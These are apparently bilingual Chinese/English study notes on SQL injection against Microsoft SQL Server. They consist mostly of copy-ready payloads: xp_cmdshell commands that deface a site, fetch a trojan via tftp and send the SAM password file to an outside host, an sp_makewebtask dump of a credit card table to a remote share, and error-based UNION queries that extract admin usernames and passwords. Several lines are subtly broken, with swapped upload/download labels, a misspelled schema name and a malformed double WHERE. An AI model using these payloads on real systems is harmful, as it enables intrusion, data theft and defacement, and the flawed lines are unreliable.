using sql server stored procedures
…
executing operating system commands
使用stored procedures such as master..xp_cmdshell
語法如下blah' ; exec master..xp_cmdshell "insert os command"
ps:若single quote無法運作可使用double quote
ex:
ping a server
blah' ; exec master..xp_cmdshell "ping 10.1.2.3" --
list the directory file
blah' ; exec master..xp_cmdshell "dir c:*.*/s > c:\directory.txt" --
create a file
blah' ; exec master..xp_cmdshell "echo hello > c:\hello.txt" --
defacing a web page
blah' ; exec master..xp_cmdshell "echo you-are-defaced > c:\inetpub\www\root\index.htm" --
execute non-gui applications
blah' ; exec master..xp_cmdshell "cmd.exe /c appname.exe" --
upload a trojan to the server
blah' ; exec master..xp_cmdshell "tftp -i 10.1.2.3 GET trojan.exe c:\trojan.exe" --
download a trojan to the server
blah' ; exec master..xp_cmdshell "tftp -i 10.1.2.1 PUT c:\winnt\repair\SAM SAM" --
…..
use sp_makewebtask to write a query into an html
sp_makewebtask是SQL Server 包含一個stored procedures
是用來得到WebShell的,主要功能就是導出資料庫中表的記錄為檔
語法如下:blah' ; exec master..sp_makewebtask "webpage","sql command"
ex:
輸出creditcard table到網頁blah' ; exec master..sp_makewebtask "\\10.10.1.4\share\creditcard.html","select * from creditcard"
…..
getting data from the database using odbc error message
使用特殊的sql query迫使MS SQL SERVER從返回的message中得到需要的資料,如table name,column name
using UNION子句
語法大致如下http://web/page.asp?var=value "UNION subquery"
系統會產生error message,並根據UNION subquery透露相關資訊
操作大致如下http://www.web.com/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEM.TABLES-
when the user UNIONS this string value to an integer 10,sql server makes an effort to convert a string(nvarchar)to an integer,thus it produces an error,since converting nvarchar to int is not possible.the server display the error
使用UNION子句將請求string value加入integer 10,SQL SERVER會嘗試轉換該string為integer
若無法把字符串(nvarchar)轉為整數型(int)時,系統就會產生錯誤
系統產生以下的error messageMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
/index.asp, line 5
此error message透露出第一個table name為table1
UNION subquery範例:
讓系統在透露出第二個table nameUNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEM.TABLES WHERE TABLE_NAME NOT IN('table1')--
系統輸出error message若出現…the nvarchar value ‘admin_name’ to a column … ,表示table name為admin_name
使用like執行以下語法可讓系統透露出含 login的第一個table nameUNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEM.TABLES WHERE TABLE_NAME like '%25LOGIN%25'--
系統輸出 error message若出現…the nvarchar value ‘admin_login’ to a column… ,表示table name為admin_login
讓系統透露出admin_login的第一個columnUNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--
系統輸出error message若出現…the nvarchar value ‘login_id’ to a column …,表示column name為login_id
讓系統透露出 admin_login的第二個columnUNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN('login_id')--
系統輸出error message若出現…the nvarchar value ‘login_name’ to a column …,表示column name為login_name
讓系統透露出admin_login資料表的login_name的第一個值UNION SELECT TOP 1 login_name FROM admin_login --
系統輸出error message若出現…the nvarchar value ‘ray’ to a column …,表示login_name第一個值為ray
讓系統透露出admin_login資料表的 password的值,且login_name為rayUNION SELECT TOP 1 password FROM admin_login where login_name='ray'--
系統輸出error message若出現…the nvarchar value ‘ixtr3n’ to a column …,表示ray的password為ixtr3n
ps:
INFORMATION_SCHEM.TABLES: contains information about all tables in the server
…..
update/insert date into database
語法大致如下http://web/page.asp?var=value;"update or insert sql query"
ex:http://www.web.com/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'goodjob' WHERE login_name='ray' --–
http://www.web.com/index.asp?id=10; INSERT INTO 'admin_login' ('login_id','loain_name','password') VALUES(123,'ray','goodjob') -
………………………………………………………………………………………………..
attacking sql servers
方法有
SSRS
Osql-l probe
sc.exe
port scanning
use of commercial alternatives
…
SSRS(sql server resolution service)
the service is responsible for sending a response packet containing the connection details of clients who send a specially formed request
the packet contains the details necessary to connect to the desired instance,including the tcp port
使用udp 1434
SSRS buffer overflow vulnerabilities:
allow remote attackers to overwrite portions of system’s memory and execute arbitrary codes
…
Osql-l probe
a command-line utility provided by microsoft with sql server 2000
allow the user to issue queries to the server
用途:list servers
…
sc.exe
the server controller command makes it possible to query servers to see if they are offering sql server services
用途:sweeping of services,查詢對方是否為sql server